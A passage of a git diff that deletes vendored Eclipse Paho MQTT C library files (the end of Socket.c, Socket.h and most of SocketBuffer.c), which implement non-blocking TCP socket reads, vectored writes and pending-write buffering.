-		rc = TCPSOCKET_COMPLETE;
-	}
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- *  Attempts to read a number of bytes from a socket, non-blocking. If a previous read did not
- *  finish, then retrieve that data.
- *  @param socket the socket to read from
- *  @param bytes the number of bytes to read
- *  @param actual_len the actual number of bytes read
- *  @return completion code
- */
-char *Socket_getdata(int socket, size_t bytes, size_t* actual_len)
-{
-	int rc;
-	char* buf;
-
-	FUNC_ENTRY;
-	if (bytes == 0)
-	{
-		buf = SocketBuffer_complete(socket);
-		goto exit;
-	}
-
-	buf = SocketBuffer_getQueuedData(socket, bytes, actual_len);
-
-	if ((rc = recv(socket, buf + (*actual_len), (int)(bytes - (*actual_len)), 0)) == SOCKET_ERROR)
-	{
-		rc = Socket_error("recv - getdata", socket);
-		if (rc != EAGAIN && rc != EWOULDBLOCK)
-		{
-			buf = NULL;
-			goto exit;
-		}
-	}
-	else if (rc == 0) /* rc 0 means the other end closed the socket, albeit "gracefully" */
-	{
-		buf = NULL;
-		goto exit;
-	}
-	else
-		*actual_len += rc;
-
-	if (*actual_len == bytes)
-		SocketBuffer_complete(socket);
-	else /* we didn't read the whole packet */
-	{
-		SocketBuffer_interrupted(socket, *actual_len);
-		Log(TRACE_MAX, -1, "%d bytes expected but %d bytes now received", bytes, *actual_len);
-	}
-exit:
-	FUNC_EXIT;
-	return buf;
-}
-
-
-/**
- *  Indicate whether any data is pending outbound for a socket.
- *  @return boolean - true == data pending.
- */
-int Socket_noPendingWrites(int socket)
-{
-	int cursock = socket;
-	return ListFindItem(s.write_pending, &cursock, intcompare) == NULL;
-}
-
-
-/**
- *  Attempts to write a series of iovec buffers to a socket in *one* system call so that
- *  they are sent as one packet.
- *  @param socket the socket to write to
- *  @param iovecs an array of buffers to write
- *  @param count number of buffers in iovecs
- *  @param bytes number of bytes actually written returned
- *  @return completion code, especially TCPSOCKET_INTERRUPTED
- */
-int Socket_writev(int socket, iobuf* iovecs, int count, unsigned long* bytes)
-{
-	int rc;
-
-	FUNC_ENTRY;
-#if defined(WIN32) || defined(WIN64)
-	rc = WSASend(socket, iovecs, count, (LPDWORD)bytes, 0, NULL, NULL);
-	if (rc == SOCKET_ERROR)
-	{
-		int err = Socket_error("WSASend - putdatas", socket);
-		if (err == EWOULDBLOCK || err == EAGAIN)
-			rc = TCPSOCKET_INTERRUPTED;
-	}
-#else
-	*bytes = 0L;
-	rc = writev(socket, iovecs, count);
-	if (rc == SOCKET_ERROR)
-	{
-		int err = Socket_error("writev - putdatas", socket);
-		if (err == EWOULDBLOCK || err == EAGAIN)
-			rc = TCPSOCKET_INTERRUPTED;
-	}
-	else
-		*bytes = rc;
-#endif
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- *  Attempts to write a series of buffers to a socket in *one* system call so that they are
- *  sent as one packet.
- *  @param socket the socket to write to
- *  @param buf0 the first buffer
- *  @param buf0len the length of data in the first buffer
- *  @param count number of buffers
- *  @param buffers an array of buffers to write
- *  @param buflens an array of corresponding buffer lengths
- *  @return completion code, especially TCPSOCKET_INTERRUPTED
- */
-int Socket_putdatas(int socket, char* buf0, size_t buf0len, int count, char** buffers, size_t* buflens, int* frees)
-{
-	unsigned long bytes = 0L;
-	iobuf iovecs[5];
-	int frees1[5];
-	int rc = TCPSOCKET_INTERRUPTED, i;
-	size_t total = buf0len;
-
-	FUNC_ENTRY;
-	if (!Socket_noPendingWrites(socket))
-	{
-		Log(LOG_SEVERE, -1, "Trying to write to socket %d for which there is already pending output", socket);
-		rc = SOCKET_ERROR;
-		goto exit;
-	}
-
-	for (i = 0; i < count; i++)
-		total += buflens[i];
-
-	iovecs[0].iov_base = buf0;
-	iovecs[0].iov_len = (ULONG)buf0len;
-	frees1[0] = 1;
-	for (i = 0; i < count; i++)
-	{
-		iovecs[i+1].iov_base = buffers[i];
-		iovecs[i+1].iov_len = (ULONG)buflens[i];
-		frees1[i+1] = frees[i];
-	}
-
-	if ((rc = Socket_writev(socket, iovecs, count+1, &bytes)) != SOCKET_ERROR)
-	{
-		if (bytes == total)
-			rc = TCPSOCKET_COMPLETE;
-		else
-		{
-			int* sockmem = (int*)malloc(sizeof(int));
-			Log(TRACE_MIN, -1, "Partial write: %ld bytes of %d actually written on socket %d",
-					bytes, total, socket);
-#if defined(OPENSSL)
-			SocketBuffer_pendingWrite(socket, NULL, count+1, iovecs, frees1, total, bytes);
-#else
-			SocketBuffer_pendingWrite(socket, count+1, iovecs, frees1, total, bytes);
-#endif
-			*sockmem = socket;
-			ListAppend(s.write_pending, sockmem, sizeof(int));
-			FD_SET(socket, &(s.pending_wset));
-			rc = TCPSOCKET_INTERRUPTED;
-		}
-	}
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- *  Add a socket to the pending write list, so that it is checked for writing in select.  This is used
- *  in connect processing when the TCP connect is incomplete, as we need to check the socket for both
- *  ready to read and write states.
- *  @param socket the socket to add
- */
-void Socket_addPendingWrite(int socket)
-{
-	FD_SET(socket, &(s.pending_wset));
-}
-
-
-/**
- *  Clear a socket from the pending write list - if one was added with Socket_addPendingWrite
- *  @param socket the socket to remove
- */
-void Socket_clearPendingWrite(int socket)
-{
-	if (FD_ISSET(socket, &(s.pending_wset)))
-		FD_CLR(socket, &(s.pending_wset));
-}
-
-
-/**
- *  Close a socket without removing it from the select list.
- *  @param socket the socket to close
- *  @return completion code
- */
-int Socket_close_only(int socket)
-{
-	int rc;
-
-	FUNC_ENTRY;
-#if defined(WIN32) || defined(WIN64)
-	if (shutdown(socket, SD_BOTH) == SOCKET_ERROR)
-		Socket_error("shutdown", socket);
-	if ((rc = closesocket(socket)) == SOCKET_ERROR)
-		Socket_error("close", socket);
-#else
-	if (shutdown(socket, SHUT_WR) == SOCKET_ERROR)
-		Socket_error("shutdown", socket);
-	if ((rc = recv(socket, NULL, (size_t)0, 0)) == SOCKET_ERROR)
-		Socket_error("shutdown", socket);
-	if ((rc = close(socket)) == SOCKET_ERROR)
-		Socket_error("close", socket);
-#endif
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- *  Close a socket and remove it from the select list.
- *  @param socket the socket to close
- *  @return completion code
- */
-void Socket_close(int socket)
-{
-	FUNC_ENTRY;
-	Socket_close_only(socket);
-	FD_CLR(socket, &(s.rset_saved));
-	if (FD_ISSET(socket, &(s.pending_wset)))
-		FD_CLR(socket, &(s.pending_wset));
-	if (s.cur_clientsds != NULL && *(int*)(s.cur_clientsds->content) == socket)
-		s.cur_clientsds = s.cur_clientsds->next;
-	ListRemoveItem(s.connect_pending, &socket, intcompare);
-	ListRemoveItem(s.write_pending, &socket, intcompare);
-	SocketBuffer_cleanup(socket);
-
-	if (ListRemoveItem(s.clientsds, &socket, intcompare))
-		Log(TRACE_MIN, -1, "Removed socket %d", socket);
-	else
-		Log(LOG_ERROR, -1, "Failed to remove socket %d", socket);
-	if (socket + 1 >= s.maxfdp1)
-	{
-		/* now we have to reset s.maxfdp1 */
-		ListElement* cur_clientsds = NULL;
-
-		s.maxfdp1 = 0;
-		while (ListNextElement(s.clientsds, &cur_clientsds))
-			s.maxfdp1 = max(*((int*)(cur_clientsds->content)), s.maxfdp1);
-		++(s.maxfdp1);
-		Log(TRACE_MAX, -1, "Reset max fdp1 to %d", s.maxfdp1);
-	}
-	FUNC_EXIT;
-}
-
-
-/**
- *  Create a new socket and TCP connect to an address/port
- *  @param addr the address string
- *  @param port the TCP port
- *  @param sock returns the new socket
- *  @return completion code
- */
-int Socket_new(char* addr, int port, int* sock)
-{
-	int type = SOCK_STREAM;
-	struct sockaddr_in address;
-#if defined(AF_INET6)
-	struct sockaddr_in6 address6;
-#endif
-	int rc = SOCKET_ERROR;
-#if defined(WIN32) || defined(WIN64)
-	short family;
-#else
-	sa_family_t family = AF_INET;
-#endif
-	struct addrinfo *result = NULL;
-	struct addrinfo hints = {0, AF_UNSPEC, SOCK_STREAM, IPPROTO_TCP, 0, NULL, NULL, NULL};
-
-	FUNC_ENTRY;
-	*sock = -1;
-	memset(&address6, '\0', sizeof(address6));
-
-	if (addr[0] == '[')
-	  ++addr;
-
-	if ((rc = getaddrinfo(addr, NULL, &hints, &result)) == 0)
-	{
-		struct addrinfo* res = result;
-
-		while (res)
-		{	/* prefer ip4 addresses */
-			if (res->ai_family == AF_INET || res->ai_next == NULL)
-				break;
-			res = res->ai_next;
-		}
-
-		if (res == NULL)
-			rc = -1;
-		else
-#if defined(AF_INET6)
-		if (res->ai_family == AF_INET6)
-		{
-			address6.sin6_port = htons(port);
-			address6.sin6_family = family = AF_INET6;
-			memcpy(&address6.sin6_addr, &((struct sockaddr_in6*)(res->ai_addr))->sin6_addr, sizeof(address6.sin6_addr));
-		}
-		else
-#endif
-		if (res->ai_family == AF_INET)
-		{
-			address.sin_port = htons(port);
-			address.sin_family = family = AF_INET;
-			address.sin_addr = ((struct sockaddr_in*)(res->ai_addr))->sin_addr;
-		}
-		else
-			rc = -1;
-
-		freeaddrinfo(result);
-	}
-	else
-	  	Log(LOG_ERROR, -1, "getaddrinfo failed for addr %s with rc %d", addr, rc);
-
-	if (rc != 0)
-		Log(LOG_ERROR, -1, "%s is not a valid IP address", addr);
-	else
-	{
-		*sock =	(int)socket(family, type, 0);
-		if (*sock == INVALID_SOCKET)
-			rc = Socket_error("socket", *sock);
-		else
-		{
-#if defined(NOSIGPIPE)
-			int opt = 1;
-
-			if (setsockopt(*sock, SOL_SOCKET, SO_NOSIGPIPE, (void*)&opt, sizeof(opt)) != 0)
-				Log(LOG_ERROR, -1, "Could not set SO_NOSIGPIPE for socket %d", *sock);
-#endif
-
-			Log(TRACE_MIN, -1, "New socket %d for %s, port %d",	*sock, addr, port);
-			if (Socket_addSocket(*sock) == SOCKET_ERROR)
-				rc = Socket_error("addSocket", *sock);
-			else
-			{
-				/* this could complete immmediately, even though we are non-blocking */
-				if (family == AF_INET)
-					rc = connect(*sock, (struct sockaddr*)&address, sizeof(address));
-	#if defined(AF_INET6)
-				else
-					rc = connect(*sock, (struct sockaddr*)&address6, sizeof(address6));
-	#endif
-				if (rc == SOCKET_ERROR)
-					rc = Socket_error("connect", *sock);
-				if (rc == EINPROGRESS || rc == EWOULDBLOCK)
-				{
-					int* pnewSd = (int*)malloc(sizeof(int));
-					*pnewSd = *sock;
-					ListAppend(s.connect_pending, pnewSd, sizeof(int));
-					Log(TRACE_MIN, 15, "Connect pending");
-				}
-			}
-                        /* Prevent socket leak by closing unusable sockets,
-                         * as reported in
-                         * https://github.com/eclipse/paho.mqtt.c/issues/135
-                         */
-                        if (rc != 0 && (rc != EINPROGRESS) && (rc != EWOULDBLOCK))
-                        {
-                            Socket_close(*sock); /* close socket and remove from our list of sockets */
-                            *sock = -1; /* as initialized before */
-                        }
-		}
-	}
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static Socket_writeComplete* writecomplete = NULL;
-
-void Socket_setWriteCompleteCallback(Socket_writeComplete* mywritecomplete)
-{
-	writecomplete = mywritecomplete;
-}
-
-/**
- *  Continue an outstanding write for a particular socket
- *  @param socket that socket
- *  @return completion code
- */
-int Socket_continueWrite(int socket)
-{
-	int rc = 0;
-	pending_writes* pw;
-	unsigned long curbuflen = 0L, /* cumulative total of buffer lengths */
-		bytes;
-	int curbuf = -1, i;
-	iobuf iovecs1[5];
-
-	FUNC_ENTRY;
-	pw = SocketBuffer_getWrite(socket);
-
-#if defined(OPENSSL)
-	if (pw->ssl)
-	{
-		rc = SSLSocket_continueWrite(pw);
-		goto exit;
-	}
-#endif
-
-	for (i = 0; i < pw->count; ++i)
-	{
-		if (pw->bytes <= curbuflen)
-		{ /* if previously written length is less than the buffer we are currently looking at,
-				add the whole buffer */
-			iovecs1[++curbuf].iov_len = pw->iovecs[i].iov_len;
-			iovecs1[curbuf].iov_base = pw->iovecs[i].iov_base;
-		}
-		else if (pw->bytes < curbuflen + pw->iovecs[i].iov_len)
-		{ /* if previously written length is in the middle of the buffer we are currently looking at,
-				add some of the buffer */
-			size_t offset = pw->bytes - curbuflen;
-			iovecs1[++curbuf].iov_len = pw->iovecs[i].iov_len - (ULONG)offset;
-			iovecs1[curbuf].iov_base = (char*)pw->iovecs[i].iov_base + offset;
-			break;
-		}
-		curbuflen += pw->iovecs[i].iov_len;
-	}
-
-	if ((rc = Socket_writev(socket, iovecs1, curbuf+1, &bytes)) != SOCKET_ERROR)
-	{
-		pw->bytes += bytes;
-		if ((rc = (pw->bytes == pw->total)))
-		{  /* topic and payload buffers are freed elsewhere, when all references to them have been removed */
-			for (i = 0; i < pw->count; i++)
-			{
-				if (pw->frees[i])
-					free(pw->iovecs[i].iov_base);
-			}
-			Log(TRACE_MIN, -1, "ContinueWrite: partial write now complete for socket %d", socket);
-		}
-		else
-			Log(TRACE_MIN, -1, "ContinueWrite wrote +%lu bytes on socket %d", bytes, socket);
-	}
-#if defined(OPENSSL)
-exit:
-#endif
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- *  Continue any outstanding writes for a socket set
- *  @param pwset the set of sockets
- *  @return completion code
- */
-int Socket_continueWrites(fd_set* pwset)
-{
-	int rc1 = 0;
-	ListElement* curpending = s.write_pending->first;
-
-	FUNC_ENTRY;
-	while (curpending)
-	{
-		int socket = *(int*)(curpending->content);
-		if (FD_ISSET(socket, pwset) && Socket_continueWrite(socket))
-		{
-			if (!SocketBuffer_writeComplete(socket))
-				Log(LOG_SEVERE, -1, "Failed to remove pending write from socket buffer list");
-			FD_CLR(socket, &(s.pending_wset));
-			if (!ListRemove(s.write_pending, curpending->content))
-			{
-				Log(LOG_SEVERE, -1, "Failed to remove pending write from list");
-				ListNextElement(s.write_pending, &curpending);
-			}
-			curpending = s.write_pending->current;
-
-			if (writecomplete)
-				(*writecomplete)(socket);
-		}
-		else
-			ListNextElement(s.write_pending, &curpending);
-	}
-	FUNC_EXIT_RC(rc1);
-	return rc1;
-}
-
-
-/**
- *  Convert a numeric address to character string
- *  @param sa	socket numerical address
- *  @param sock socket
- *  @return the peer information
- */
-char* Socket_getaddrname(struct sockaddr* sa, int sock)
-{
-/**
- * maximum length of the address string
- */
-#define ADDRLEN INET6_ADDRSTRLEN+1
-/**
- * maximum length of the port string
- */
-#define PORTLEN 10
-	static char addr_string[ADDRLEN + PORTLEN];
-
-#if defined(WIN32) || defined(WIN64)
-	int buflen = ADDRLEN*2;
-	wchar_t buf[ADDRLEN*2];
-	if (WSAAddressToStringW(sa, sizeof(struct sockaddr_in6), NULL, buf, (LPDWORD)&buflen) == SOCKET_ERROR)
-		Socket_error("WSAAddressToString", sock);
-	else
-		wcstombs(addr_string, buf, sizeof(addr_string));
-	/* TODO: append the port information - format: [00:00:00::]:port */
-	/* strcpy(&addr_string[strlen(addr_string)], "what?"); */
-#else
-	struct sockaddr_in *sin = (struct sockaddr_in *)sa;
-	inet_ntop(sin->sin_family, &sin->sin_addr, addr_string, ADDRLEN);
-	sprintf(&addr_string[strlen(addr_string)], ":%d", ntohs(sin->sin_port));
-#endif
-	return addr_string;
-}
-
-
-/**
- *  Get information about the other end connected to a socket
- *  @param sock the socket to inquire on
- *  @return the peer information
- */
-char* Socket_getpeer(int sock)
-{
-	struct sockaddr_in6 sa;
-	socklen_t sal = sizeof(sa);
-	int rc;
-
-	if ((rc = getpeername(sock, (struct sockaddr*)&sa, &sal)) == SOCKET_ERROR)
-	{
-		Socket_error("getpeername", sock);
-		return "unknown";
-	}
-
-	return Socket_getaddrname((struct sockaddr*)&sa, sock);
-}
-
-
-#if defined(Socket_TEST)
-
-int main(int argc, char *argv[])
-{
-	Socket_connect("127.0.0.1", 1883);
-	Socket_connect("localhost", 1883);
-	Socket_connect("loadsadsacalhost", 1883);
-}
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/Socket.h b/thirdparty/paho.mqtt.c/src/Socket.h
deleted file mode 100644
index dbf21b4..0000000
--- a/thirdparty/paho.mqtt.c/src/Socket.h
+++ /dev/null
@@ -1,143 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2014 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial implementation and documentation
- *    Ian Craggs - async client updates
- *******************************************************************************/
-
-#if !defined(SOCKET_H)
-#define SOCKET_H
-
-#include <sys/types.h>
-
-#if defined(WIN32) || defined(WIN64)
-#include <winsock2.h>
-#include <ws2tcpip.h>
-#define MAXHOSTNAMELEN 256
-#if !defined(SSLSOCKET_H)
-#undef EAGAIN
-#define EAGAIN WSAEWOULDBLOCK
-#undef EINTR
-#define EINTR WSAEINTR
-#undef EINPROGRESS
-#define EINPROGRESS WSAEINPROGRESS
-#undef EWOULDBLOCK
-#define EWOULDBLOCK WSAEWOULDBLOCK
-#undef ENOTCONN
-#define ENOTCONN WSAENOTCONN
-#undef ECONNRESET
-#define ECONNRESET WSAECONNRESET
-#undef ETIMEDOUT
-#define ETIMEDOUT WAIT_TIMEOUT
-#endif
-#define ioctl ioctlsocket
-#define socklen_t int
-#else
-#define INVALID_SOCKET SOCKET_ERROR
-#include <sys/socket.h>
-#if !defined(_WRS_KERNEL)
-#include <sys/param.h>
-#include <sys/time.h>
-#include <sys/select.h>
-#include <sys/uio.h>
-#else
-#include <selectLib.h>
-#endif
-#include <netinet/in.h>
-#include <netinet/tcp.h>
-#include <arpa/inet.h>
-#include <netdb.h>
-#include <stdio.h>
-#include <unistd.h>
-#include <errno.h>
-#include <fcntl.h>
-#include <unistd.h>
-#define ULONG size_t
-#endif
-
-/** socket operation completed successfully */
-#define TCPSOCKET_COMPLETE 0
-#if !defined(SOCKET_ERROR)
-	/** error in socket operation */
-	#define SOCKET_ERROR -1
-#endif
-/** must be the same as SOCKETBUFFER_INTERRUPTED */
-#define TCPSOCKET_INTERRUPTED -22
-#define SSL_FATAL -3
-
-#if !defined(INET6_ADDRSTRLEN)
-#define INET6_ADDRSTRLEN 46 /** only needed for gcc/cygwin on windows */
-#endif
-
-
-#if !defined(max)
-#define max(A,B) ( (A) > (B) ? (A):(B))
-#endif
-
-#include "LinkedList.h"
-
-/*BE
-def FD_SET
-{
-   128 n8 "data"
-}
-
-def SOCKETS
-{
-	FD_SET "rset"
-	FD_SET "rset_saved"
-	n32 dec "maxfdp1"
-	n32 ptr INTList "clientsds"
-	n32 ptr INTItem "cur_clientsds"
-	n32 ptr INTList "connect_pending"
-	n32 ptr INTList "write_pending"
-	FD_SET "pending_wset"
-}
-BE*/
-
-
-/**
- * Structure to hold all socket data for the module
- */
-typedef struct
-{
-	fd_set rset, /**< socket read set (see select doc) */
-		rset_saved; /**< saved socket read set */
-	int maxfdp1; /**< max descriptor used +1 (again see select doc) */
-	List* clientsds; /**< list of client socket descriptors */
-	ListElement* cur_clientsds; /**< current client socket descriptor (iterator) */
-	List* connect_pending; /**< list of sockets for which a connect is pending */
-	List* write_pending; /**< list of sockets for which a write is pending */
-	fd_set pending_wset; /**< socket pending write set for select */
-} Sockets;
-
-
-void Socket_outInitialize(void);
-void Socket_outTerminate(void);
-int Socket_getReadySocket(int more_work, struct timeval *tp);
-int Socket_getch(int socket, char* c);
-char *Socket_getdata(int socket, size_t bytes, size_t* actual_len);
-int Socket_putdatas(int socket, char* buf0, size_t buf0len, int count, char** buffers, size_t* buflens, int* frees);
-void Socket_close(int socket);
-int Socket_new(char* addr, int port, int* socket);
-
-int Socket_noPendingWrites(int socket);
-char* Socket_getpeer(int sock);
-
-void Socket_addPendingWrite(int socket);
-void Socket_clearPendingWrite(int socket);
-
-typedef void Socket_writeComplete(int socket);
-void Socket_setWriteCompleteCallback(Socket_writeComplete*);
-
-#endif /* SOCKET_H */
diff --git a/thirdparty/paho.mqtt.c/src/SocketBuffer.c b/thirdparty/paho.mqtt.c/src/SocketBuffer.c
deleted file mode 100644
index ba640f1..0000000
--- a/thirdparty/paho.mqtt.c/src/SocketBuffer.c
+++ /dev/null
@@ -1,413 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL updates
- *    Ian Craggs - fix for issue #244, issue #20
- *******************************************************************************/
-
-/**
- * @file
- * \brief Socket buffering related functions
- *
- * Some other related functions are in the Socket module
- */
-#include "SocketBuffer.h"
-#include "LinkedList.h"
-#include "Log.h"
-#include "Messages.h"
-#include "StackTrace.h"
-
-#include <stdlib.h>
-#include <stdio.h>
-#include <string.h>
-
-#include "Heap.h"
-
-#if defined(WIN32) || defined(WIN64)
-#define iov_len len
-#define iov_base buf
-#endif
-
-/**
- * Default input queue buffer
- */
-static socket_queue* def_queue;
-
-/**
- * List of queued input buffers
- */
-static List* queues;
-
-/**
- * List of queued write buffers
- */
-static List writes;
-
-
-int socketcompare(void* a, void* b);
-void SocketBuffer_newDefQ(void);
-void SocketBuffer_freeDefQ(void);
-int pending_socketcompare(void* a, void* b);
-
-
-/**
- * List callback function for comparing socket_queues by socket
- * @param a first integer value
- * @param b second integer value
- * @return boolean indicating whether a and b are equal
- */
-int socketcompare(void* a, void* b)
-{
-	return ((socket_queue*)a)->socket == *(int*)b;
-}
-
-
-/**
- * Create a new default queue when one has just been used.
- */
-void SocketBuffer_newDefQ(void)
-{
-	def_queue = malloc(sizeof(socket_queue));
-	def_queue->buflen = 1000;
-	def_queue->buf = malloc(def_queue->buflen);
-	def_queue->socket = def_queue->index = 0;
-	def_queue->buflen = def_queue->datalen = 0;
-}
-
-
-/**
- * Initialize the socketBuffer module
- */
-void SocketBuffer_initialize(void)
-{
-	FUNC_ENTRY;
-	SocketBuffer_newDefQ();
-	queues = ListInitialize();
-	ListZero(&writes);
-	FUNC_EXIT;
-}
-
-
-/**
- * Free the default queue memory
- */
-void SocketBuffer_freeDefQ(void)
-{
-	free(def_queue->buf);
-	free(def_queue);
-}
-
-
-/**
- * Terminate the socketBuffer module
- */
-void SocketBuffer_terminate(void)
-{
-	ListElement* cur = NULL;
-	ListEmpty(&writes);
-
-	FUNC_ENTRY;
-	while (ListNextElement(queues, &cur))
-		free(((socket_queue*)(cur->content))->buf);
-	ListFree(queues);
-	SocketBuffer_freeDefQ();
-	FUNC_EXIT;
-}
-
-
-/**
- * Cleanup any buffers for a specific socket
- * @param socket the socket to clean up
- */
-void SocketBuffer_cleanup(int socket)
-{
-	FUNC_ENTRY;
-	SocketBuffer_writeComplete(socket); /* clean up write buffers */
-	if (ListFindItem(queues, &socket, socketcompare))
-	{
-		free(((socket_queue*)(queues->current->content))->buf);
-		ListRemove(queues, queues->current->content);
-	}
-	if (def_queue->socket == socket)
-	{
-		def_queue->socket = def_queue->index = 0;
-		def_queue->headerlen = def_queue->datalen = 0;
-	}
-	FUNC_EXIT;
-}
-
-
-/**
- * Get any queued data for a specific socket
- * @param socket the socket to get queued data for
- * @param bytes the number of bytes of data to retrieve
- * @param actual_len the actual length returned
- * @return the actual data
- */
-char* SocketBuffer_getQueuedData(int socket, size_t bytes, size_t* actual_len)
-{
-	socket_queue* queue = NULL;
-
-	FUNC_ENTRY;
-	if (ListFindItem(queues, &socket, socketcompare))
-	{  /* if there is queued data for this socket, add any data read to it */
-		queue = (socket_queue*)(queues->current->content);
-		*actual_len = queue->datalen;
-	}
-	else
-	{
-		*actual_len = 0;
-		queue = def_queue;
-	}
-	if (bytes > queue->buflen)
-	{
-		if (queue->datalen > 0)
-		{
-			void* newmem = malloc(bytes);
-			memcpy(newmem, queue->buf, queue->datalen);
-			free(queue->buf);
-			queue->buf = newmem;
-		}
-		else
-			queue->buf = realloc(queue->buf, bytes);
-		queue->buflen = bytes;
-	}
-
-	FUNC_EXIT;
-	return queue->buf;
-}
-
-
-/**
- * Get any queued character for a specific socket
- * @param socket the socket to get queued data for
- * @param c the character returned if any
- * @return completion code
- */
-int SocketBuffer_getQueuedChar(int socket, char* c)
-{
-	int rc = SOCKETBUFFER_INTERRUPTED;
-
-	FUNC_ENTRY;
-	if (ListFindItem(queues, &socket, socketcompare))
-	{  /* if there is queued data for this socket, read that first */
-		socket_queue* queue = (socket_queue*)(queues->current->content);
-		if (queue->index < queue->headerlen)
-		{
-			*c = queue->fixed_header[(queue->index)++];
-			Log(TRACE_MAX, -1, "index is now %d, headerlen %d", queue->index, queue->headerlen);
-			rc = SOCKETBUFFER_COMPLETE;
-			goto exit;
-		}
-		else if (queue->index > 4)
-		{
-			Log(LOG_FATAL, -1, "header is already at full length");
-			rc = SOCKET_ERROR;
-			goto exit;
-		}
-	}
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;  /* there was no queued char if rc is SOCKETBUFFER_INTERRUPTED*/
-}
-
-
-/**
- * A socket read was interrupted so we need to queue data
- * @param socket the socket to get queued data for
- * @param actual_len the actual length of data that was read
- */
-void SocketBuffer_interrupted(int socket, size_t actual_len)
-{
-	socket_queue* queue = NULL;
-
-	FUNC_ENTRY;
-	if (ListFindItem(queues, &socket, socketcompare))
-		queue = (socket_queue*)(queues->current->content);
-	else /* new saved queue */
-	{
-		queue = def_queue;
-		/* if SocketBuffer_queueChar() has not yet been called, then the socket number
-		  in def_queue will not have been set.  Issue #244.
-		  If actual_len == 0 then we may not need to do anything - I'll leave that
-		  optimization for another time. */
-		queue->socket = socket;
-		ListAppend(queues, def_queue, sizeof(socket_queue)+def_queue->buflen);
-		SocketBuffer_newDefQ();
-	}
-	queue->index = 0;
-	queue->datalen = actual_len;
-	FUNC_EXIT;
-}
-
-
-/**
- * A socket read has now completed so we can get rid of the queue
- * @param socket the socket for which the operation is now complete
- * @return pointer to the default queue data
- */
-char* SocketBuffer_complete(int socket)
-{
-	FUNC_ENTRY;
-	if (ListFindItem(queues, &socket, socketcompare))
-	{
-		socket_queue* queue = (socket_queue*)(queues->current->content);
-		SocketBuffer_freeDefQ();
-		def_queue = queue;
-		ListDetach(queues, queue);
-	}
-	def_queue->socket = def_queue->index = 0;
-	def_queue->headerlen = def_queue->datalen = 0;
-	FUNC_EXIT;
-	return def_queue->buf;
-}
-
-
-/**
- * A socket operation had now completed so we can get rid of the queue
- * @param socket the socket for which the operation is now complete
- * @param c the character to queue
- */
-void SocketBuffer_queueChar(int socket, char c)
-{
-	int error = 0;
-	socket_queue* curq = def_queue;
-
-	FUNC_ENTRY;
-	if (ListFindItem(queues, &socket, socketcompare))
-		curq = (socket_queue*)(queues->current->content);
-	else if (def_queue->socket == 0)
-	{
-		def_queue->socket = socket;
-		def_queue->index = 0;
-		def_queue->datalen = 0;
-	}
-	else if (def_queue->socket != socket)
-	{
-		Log(LOG_FATAL, -1, "attempt to reuse socket queue");
-		error = 1;
-	}
-	if (curq->index > 4)
-	{
-		Log(LOG_FATAL, -1, "socket queue fixed_header field full");
-		error = 1;
-	}
-	if (!error)
-	{
-		curq->fixed_header[(curq->index)++] = c;
-		curq->headerlen = curq->index;
-	}
-	Log(TRACE_MAX, -1, "queueChar: index is now %d, headerlen %d", curq->index, curq->headerlen);
-	FUNC_EXIT;
-}
-
-
-/**
- * A socket write was interrupted so store the remaining data
- * @param socket the socket for which the write was interrupted
- * @param count the number of iovec buffers
- * @param iovecs buffer array
- * @param total total data length to be written
- * @param bytes actual data length that was written
- */
-#if defined(OPENSSL)
-void SocketBuffer_pendingWrite(int socket, SSL* ssl, int count, iobuf* iovecs, int* frees, size_t total, size_t bytes)
-#else
-void SocketBuffer_pendingWrite(int socket, int count, iobuf* iovecs, int* frees, size_t total, size_t bytes)
-#endif
-{
-	int i = 0;
-	pending_writes* pw = NULL;
-
-	FUNC_ENTRY;
-	/* store the buffers until the whole packet is written */
-	pw = malloc(sizeof(pending_writes));
-	pw->socket = socket;
-#if defined(OPENSSL)
-	pw->ssl = ssl;
-#endif
-	pw->bytes = bytes;
-	pw->total = total;
-	pw->count = count;
-	for (i = 0; i < count; i++)
-	{
-		pw->iovecs[i] = iovecs[i];
-		pw->frees[i] = frees[i];
-	}
-	ListAppend(&writes, pw, sizeof(pw) + total);
-	FUNC_EXIT;
-}
-
-
-/**
- * List callback function for comparing pending_writes by socket
- * @param a first integer value
- * @param b second integer value
- * @return boolean indicating whether a and b are equal
- */
-int pending_socketcompare(void* a, void* b)
-{
-	return ((pending_writes*)a)->socket == *(int*)b;
-}
-
-
-/**
- * Get any queued write data for a specific socket
- * @param socket the socket to get queued data for
- * @return pointer to the queued data or NULL
- */
-pending_writes* SocketBuffer_getWrite(int socket)
-{
-	ListElement* le = ListFindItem(&writes, &socket, pending_socketcompare);
-	return (le) ? (pending_writes*)(le->content) : NULL;
-}
-
-
-/**
- * A socket write has now completed so we can get rid of the queue
- * @param socket the socket for which the operation is now complete
- * @return completion code, boolean - was the queue removed?
- */
-int SocketBuffer_writeComplete(int socket)
-{
-	return ListRemoveItem(&writes, &socket, pending_socketcompare);
-}
-
-
-/**
- * Update the queued write data for a socket in the case of QoS 0 messages.
- * @param socket the socket for which the operation is now complete
- * @param topic the topic of the QoS 0 write
- * @param payload the payload of the QoS 0 write
- * @return pointer to the updated queued data structure, or NULL
- */
